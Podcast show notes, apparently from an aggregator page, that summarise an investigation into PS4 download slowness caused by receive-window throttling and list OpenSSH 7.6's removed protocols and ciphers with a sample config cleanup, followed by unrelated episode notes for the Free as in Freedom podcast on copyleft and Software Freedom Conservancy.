From the blog that brought us “The origins of XXX as FIXME (https://www.snellman.net/blog/archive/2017-04-17-xxx-fixme/)” and “The mystery of the hanging S3 downloads (https://www.snellman.net/blog/archive/2017-07-20-s3-mystery/)”, this week it is: “Why are PS4 downloads so slow?”

Game downloads on PS4 have a reputation of being very slow, with many people reporting downloads being an order of magnitude faster on Steam or Xbox. This had long been on my list of things to look into, but at a pretty low priority. After all, the PS4 operating system is based on a reasonably modern FreeBSD (9.0), so there should not be any crippling issues in the TCP stack. The implication is that the problem is something boring, like an inadequately dimensioned CDN. But then I heard that people were successfully using local HTTP proxies as a workaround. It should be pretty rare for that to actually help with download speeds, which made this sound like a much more interesting problem.

Before running any experiments, it's good to have a mental model of how the thing we're testing works, and where the problems might be. If nothing else, it will guide the initial experiment design. The speed of a steady-state TCP connection is basically defined by three numbers: the amount of data the client is willing to receive on a single round-trip (TCP receive window), the amount of data the server is willing to send on a single round-trip (TCP congestion window), and the round trip latency between the client and the server (RTT). To a first approximation, the connection speed will be:

speed = min(rwin, cwin) / RTT

With this model, how could a proxy speed up the connection? The speed through the proxy should be the minimum of the speed between the client and proxy, and the proxy and server. It should only possibly be slower. With a local proxy, the client-proxy RTT will be very low; that connection is almost guaranteed to be the faster one. The improvement will have to be from the server-proxy connection being somehow better than the direct client-server one. The RTT will not change, so there are just two options: either the client has a much smaller receive window than the proxy, or the client is somehow causing the server's congestion window to decrease (e.g. the client is randomly dropping received packets, while the proxy isn't).
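To put rough numbers on that model, assume for illustration a 100 ms RTT to the download server and a congestion window that is not the bottleneck:

speed = min(rwin, cwin) / RTT
7 kB / 0.1 s ≈ 70 kB/s, or roughly 0.6 Mbit/s
650 kB / 0.1 s = 6.5 MB/s, or roughly 52 Mbit/s

So a receive window clamped near 7 kB, as in the findings below, is enough on its own to turn a fast connection into a dial-up-era download, no matter how well provisioned the CDN is.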
After setting up a test rig, where the PS4's connection was bridged through a Linux box so packets could be captured and artificial latency could be added, some interesting results came up:

- The differences in receive windows at different times are striking. More importantly, the changes in the receive windows correspond very well to specific things I did on the PS4.
- When the download was started, the game Styx: Shards of Darkness was running in the background (just idling in the title screen). The download was limited by a receive window of under 7kB. This is an incredibly low value; it's basically going to cause the downloads to take 100 times longer than they should. And this was not a coincidence: whenever that game was running, the receive window would be that low.
- Having an app running (e.g. Netflix, Spotify) limited the receive window to 128kB, for about a 5x reduction in potential download speed.
- Moving apps, games, or the download window to the foreground or background didn't have any effect on the receive window.
- Playing an online match in a networked game (Dreadnought) caused the receive window to be artificially limited to 7kB.
- I ran a speedtest at a time when downloads were limited to a 7kB receive window. It got a decent receive window of over 400kB; the conclusion is that the artificial receive window limit appears to apply only to PSN downloads.
- When a game was started (causing the previously running game to be stopped automatically), the receive window could increase to 650kB for a very brief period of time. Basically, it appears that the receive window gets unclamped when the old game stops, and then clamped again a few seconds later when the new game actually starts up.

I did a few more test runs, and all of them seemed to support the above findings. The only additional information from that testing is that the rest mode behavior was dependent on the PS4 settings. Originally I had it set up to suspend apps when in rest mode. If that setting was disabled, the apps would be closed when entering rest mode, and the downloads would proceed at full speed.

The PS4 doesn't make it very obvious exactly what programs are running. For games, the interaction model is that opening a new game closes the previously running one. This is not how other apps work; they remain in the background indefinitely until you explicitly close them.

So:
- FreeBSD and its network stack are not to blame.
- Sony used a poor method to try to keep downloads from interfering with your gameplay.
- The impact of changing the receive window is highly dependent upon RTT, so it doesn't work as evenly as actual traffic shaping or queueing would.

An interesting deep dive; it is well worth reading the full article and checking out the graphs.

***

OpenSSH 7.6 Released (http://www.openssh.com/releasenotes.html#7.6)

From the release notes, this release includes a number of changes that may affect existing configurations:
- ssh(1): delete SSH protocol version 1 support, associated configuration options and documentation.
- ssh(1)/sshd(8): remove support for the hmac-ripemd160 MAC.
- ssh(1)/sshd(8): remove support for the arcfour, blowfish and CAST ciphers.
- ssh(1)/sshd(8): refuse RSA keys smaller than 1024 bits.
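For anyone upgrading, the practical consequence is a config audit. The sketch below shows the flavour of client-side ssh_config cleanup involved; the deleted directive names are drawn from older OpenSSH documentation, and the replacement cipher and MAC selection is an illustrative assumption, not a recommendation from the release notes.

```
# Sketch: ssh_config cleanup after upgrading to OpenSSH 7.6 (illustrative).
Host *
    # Protocol-1-era options to delete; they no longer exist, e.g.:
    #   Protocol 2,1
    #   Cipher blowfish
    #   RSAAuthentication yes
    # Keep explicit algorithm lists free of the removed arcfour, blowfish
    # and CAST ciphers and the hmac-ripemd160 MAC. One possible selection:
    Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr
    MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
```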

Free as in Freedom
0x57: Support Conservancy Now!

Free as in Freedom

Play Episode Listen Later Nov 24, 2015 26:10


Free as in Freedom host Christopher Allan Webber interviews Karen Sandler and Bradley Kuhn about their work on copyleft and at Software Freedom Conservancy. You can become a Supporter of this work! Show Notes:
- Bradley mentioned Cygnus Solutions, ultimately acquired by Red Hat, which was an early for-profit supporter of copylefted projects.
- Bradley and Karen discussed the VMware lawsuit.
- Chris Webber wrote this blog post in response to an anti-copyleft talk given at OSCON 2015 by Shane Curcuru, who is VP of Brand Management at the Apache Software Foundation. Shane's talk is consistent with the Apache Software Foundation's historical and recent anti-copyleft positions. (12:23)

Send feedback and comments on the cast to . You can keep in touch with Free as in Freedom on our IRC channel, #faif on irc.freenode.net, and by following Conservancy on identi.ca and Twitter. Free as in Freedom is produced by Dan Lynch of danlynch.org. Theme music written and performed by Mike Tarantino with Charlie Paxson on drums. The content of this audcast, and the accompanying show notes and music, are licensed under the Creative Commons Attribution-Share-Alike 4.0 license (CC BY-SA 4.0).